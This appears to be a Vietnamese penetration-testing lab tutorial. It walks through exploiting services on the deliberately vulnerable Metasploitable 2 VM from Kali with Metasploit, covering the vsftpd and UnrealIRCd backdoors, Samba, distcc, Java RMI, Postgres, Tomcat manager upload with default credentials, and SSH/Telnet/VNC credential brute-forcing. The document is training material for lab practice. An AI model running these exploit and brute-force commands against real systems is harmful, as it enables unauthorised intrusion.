Chương 2 Khai thác các dịch vụ trong Metasploitable 2
Metasploitable là một máy ảo Linux có mục đích tạo ra môi trường lỗ hổng để ta có thể thực hành tấn công (pentesting).
Download tại: https://sourceforge.net/projects/metasploitable/
Mở bằng VMWare workstation và đăng nhập với username/password: msfadmin / msfadmin
Trong bài báo cáo này sẽ dùng lab với máy ảo Kali linux 2019.3 (192.168.42.133) và Metasploitable (192.168.42.129).
1 Quét cổng với công cụ Nmap
nmap -sV -O -v 192.168.42.129
2 Khai thác cổng 21: FTP
Dùng search vsftpd trong metasploit
Bây giờ tiến hành khai thác:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.42.129
exploit
Vậy là chúng ta đã có được command shell của máy remote (192.168.42.129)
Đánh help để xem trợ giúp các lệnh của shell. Vì máy remote là một máy Linux nên chúng ta có thể sử dụng các lệnh như một máy Linux/Unix.
3. Khai thác port 22 SSH
Giả sử chúng ta đã biết được username / password của máy bị attack (dịch vụ SSH). Bây giờ chúng ta sẽ khai thác port 22 trên máy ảo metasploitable.
Metasploit có một chức năng auxiliary mà chúng ta sẽ sử dụng trên dịch vụ SSH chạy trên cổng 22. Một khi chúng ta có được session chúng ta có thể nâng cấp lên phiên meterpreter.
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.42.129
set USER_FILE /root/Desktop/user.txt
set PASS_FILE /root/Desktop/pass.txt
exploit
Sau khi nâng cấp từ shell lên meterpreter dùng lệnh sessions –u 1
4. Khai thác port 23 TELNET
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.42.129
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
set stop_on_success true
exploit
5 Khai thác port 139 và 445 (Samba)
Samba đang chạy trên cả cổng 139 và 445, chúng tôi sẽ khai thác nó bằng Metasploit. Cổng mặc định cho khai thác này được đặt thành cổng 139 nhưng cũng có thể thay đổi thành cổng 445.
use exploit/multi/samba/usermap_script
set rhosts 192.168.42.129
exploit
Sau khi đã có phiên session chúng ta có thể nâng cấp lên thành phiên meterpreter bằng lệnh sesions –u -1. Lưu ý số 1 ở đây là session 1 đã tạo ra ở trên.
6 Khai thác port 8080 (Java)
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.42.129
exploit
7 Khai thác port 5432 (Postgres)
use exploit/linux/postgres/postgres_payload
set rhosts 192.168.42.129
exploit
8 Khai thác Port 6667 (UnrealIRCD)
Cổng 6667 có dịch vụ IRCD Unreal đang chạy, chúng tôi sẽ khai thác bằng cách sử dụng một backdoor có sẵn trong Metasploit.
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhosts 192.168.42.129
exploit
9 Khai thác port 36255
Đây là một điểm yếu cho phép các lệnh tùy ý trên các hệ thống chạy distccd. Chúng ta sẽ thực thi lệnh của Distcc Daemon. Mô-đun này sử dụng điểm yếu bảo mật được ghi lại để thực thi các lệnh tùy ý trên bất kỳ hệ thống nào chạy distccd.
use exploit/unix/misc/distcc_exec
set rhosts 192.168.42.129
exploit
10 Khai thác đăng nhập từ xa (Remote Login)
use auxiliary/scanner/rservices/rlogin_login
set rhosts 192.168.42.129
set username root
exploit
11 Exploiting Distributed Ruby Remote Code Execution (8787)
use exploit/linux/misc/drb_remote_codeexec
set rhosts 192.168.42.129
exploit
12Bindshell Exploitation
Metasploitable 2 đi kèm với dịch vụ bindshell mở chạy trên cổng 1524. Chúng ta sẽ sử dụng Netcat để kết nối với nó.
13 Exploiting Port 5900 (VNC)
Virtual Network Computing hoặc dịch vụ VNC chạy trên cổng 5900, dịch vụ này có thể được khai thác bằng cách sử dụng một mô-đun trong Metasploit để tìm thông tin đăng nhập.
use auxiliary/scanner/vnc/vnc_login
set login 192.168.42.129
exploit
Bây giờ thử kết nối bằng vncviewer với password tìm được ở trên
14 Khai thác Port 8180 (Apache Tomcat)
Trong quá trình quét dịch vụ rằng Apache Tomcat đang chạy trên cổng 8180. Metasploit có một khai thác cho Tomcat mà chúng ta có thể sử dụng để có được một phiên Meterpreter. Khai thác sử dụng thông tin đăng nhập mặc định được sử dụng bởi Tomcat để có quyền truy cập.
use exploit/multi/http/tomcat_mgr_upload
set rhost 192.168.42.129
set rpost 8180
set httpusername tomcat
set httppassword tomcat
exploit
Sau cùng chúng ta cũng không quên tắt máy ảo metasploitable 2 đúng cách bằng lệnh: sudo shutdown –h now
Chúc bạn thành công.